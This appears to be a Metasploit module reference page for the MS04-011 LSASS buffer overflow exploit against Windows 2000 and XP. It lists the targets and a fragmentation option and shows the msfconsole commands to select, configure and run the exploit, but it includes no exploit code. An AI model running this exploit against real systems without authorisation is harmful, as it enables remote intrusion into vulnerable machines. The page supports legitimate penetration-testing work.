MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
This module exploits a stack buffer overflow in the LSASS service, this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need need to run this module twice. DCERPC request fragmentation can be performed by setting 'FragSize' parameter.
- hdm <x [at] hdm.io>
- Automatic Targetting
- Windows 2000 English
- Windows XP English
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
msf > use exploit/windows/smb/ms04_011_lsass msf exploit(ms04_011_lsass) > show targets ...targets... msf exploit(ms04_011_lsass) > set TARGET <target-id> msf exploit(ms04_011_lsass) > show options ...show and set options... msf exploit(ms04_011_lsass) > exploit